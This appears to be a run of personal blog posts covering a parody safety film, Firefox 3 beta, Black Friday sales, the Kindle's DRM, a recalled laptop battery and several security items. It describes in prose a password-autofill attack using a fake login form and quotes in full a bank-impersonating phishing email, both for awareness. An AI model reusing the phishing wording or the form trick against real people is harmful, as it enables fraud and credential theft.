Forklift Driver Klaus (a.k.a. Staplerfahrer Klaus)- a parody of work safety films in which a forklift driver blunders through his first day on the job, maiming fellow employees left and right. German with English subtitles. (via TV Tropes: Scare Em Straight)
And, on a more serious note, the Internet Storm Center is reporting on people finding malware pre-installed on digital picture frames, memory cards, etc. Something to watch out for with portable devices that can connect to your computer.
Firefox 3 Beta 1 is out. Nice so far. Oddly enough, it runs better than the current Opera 9.5 previews on my old Linux box at work, though that mostly seems to be the fault of the find-in-history option.
I usually avoid any sort of shopping on the day after Thanksgiving, online included, but I’ve been getting email from various online stores that are trying to get into Black Friday. Amazon is advertising a Black Friday Sale, and Apple is promoting a “special one-day shopping event” on their website—and annoyingly, neither of them is giving any clue as to what sort of deals are involved. Amazon keeps forwarding me to today’s deals, and Apple just says something’s coming. And neither site lists actual hours. Is it midnight to midnight? What time zone?
Speaking of Amazon, their entire home page is currently taken up by the announcement of their new eBook reader, Kindle. At $400 I’m not going to rush out and buy one, but it looks like they’ve solved some of the main e-book problems: it’s small, light and wireless, and they even bring up the reading-in-bed issue in the intro. The real question is going to be compatibility & openness: It’ll read plain text, HTML, Word, and a few other document formats (and they’re promoting its access to Wikipedia), so it should be possible for other stores to sell books for the device. And what about the e-book offerings themselves? Will they be loaded down with draconian digital rights management like the Adobe ebooks of a few years ago, or are they following the model of Amazon’s MP3 store?* In a nice change, their music downloads are entirely DRM-free and they use it as a selling point. Edit: Per Andrea’s comments and further research, Kindle ebooks are locked down with DRM. No, thanks!
The name, however, makes me wonder how soon they’ll offer Fahrenheit 451.
Finally, the Internet Storm Center has an insightful response to the statement, “There is nothing on my computer that a hacker would be interested in.” Let’s leave aside the question of your personal data for the moment. Just the fact that you’ve got a computer with an internet connection could prove very useful to someone who wants to cover their tracks or just add more power to their own distributed system.
* Amazon’s MP3 store is also surprisingly cheap. I replaced my old tapes of the original cast recordings of Les Misérables (Broadway) and Phantom Of The Opera for $9 each—they run upwards of $30 on CD.
ISC is reporting a new type of vulnerability in web browsers that the discoverer has termed as “Reverse Cross-Site Request,” or RCSR.
Basically, on a site with user-generated content—like a hosted blog—it’s possible to add a form that looks like the site’s login form. If the victim has an account on the same site, and has asked their browser to save their password, it will auto-fill the form. If the attacker can somehow trick the visitor into submitting the form—say, with an invisible image submit button (ever clicked randomly? Or to get back to the page after looking at another window?)—the attacker gets the visitor’s password.
What’s new about this is that all it requires is plain HTML, not scripting, which most blog hosts and similar sites already block.
Chapin Information Services discovered the bug in Firefox 2, and reported it to Mozilla. It turns out that Internet Explorer 6 and 7 are also vulnerable, but only if it’s on the same page as the real login form. Mozilla is currently trying to determine the best way of resolving the problem without breaking all the passwords people have already saved. The ISC article links to the bug report, so you can follow the discussion. Microsoft has only said that they’re “aware of the issue.”
At the moment, I’m glad I don’t let web browsers save my passwords.
Received the replacement battery for the PowerBook yesterday. It was shipped out via DHL, with a prepaid return label for shipping the old battery back via regular mail.
Last night I drained the old battery, plugged the new one in, and packaged up the recalled one in the box. At lunch today I went to the post office to send it off.
As I was walking up the steps, I remembered the “Does this package contain anything liquid, explosive, or otherwise hazardous?” question that postal clerks are required to ask. If you’re mailing a defective battery that could theoretically burst into flames, how exactly are you supposed to answer?
I figured it would be best not to joke about it.
As it was, I just said it was a laptop battery straight out, so the question didn’t come up.
I just spotted a rather disturbing phishing message in (of all places) our abuse contact mailbox:
Subject: Fraud Prevention Measures
Dear customer!
Due to high fraud activity we constantly increasing security level both for online banking and card transactions. In order to update our records you are required to call MBNA Card Service number at 1-800-[removed] and update information on your MBNA card.
This is free of charge and would not affect any transactions with your card. Please note this is necessary to provide highest security level for all transactions with your card.
No HTML tricks. No links to fraudulent websites. Just a phone number.
I can only assume this is a response to high-profile inclusion of antiphishing features in Internet Explorer 7 and in Firefox 2. If there’s no website, there’s nothing for a web browser to check.
And of course by not using sneaky technical tricks in the message, it’s harder for tools like ClamAV, spam filters, or mail clients to detect.
Incidentally, does anyone else find it ironic that one of the most common phishing techniques is to exploit people’s fear of being phished?
Further reading: Anti-Phishing Working Group.
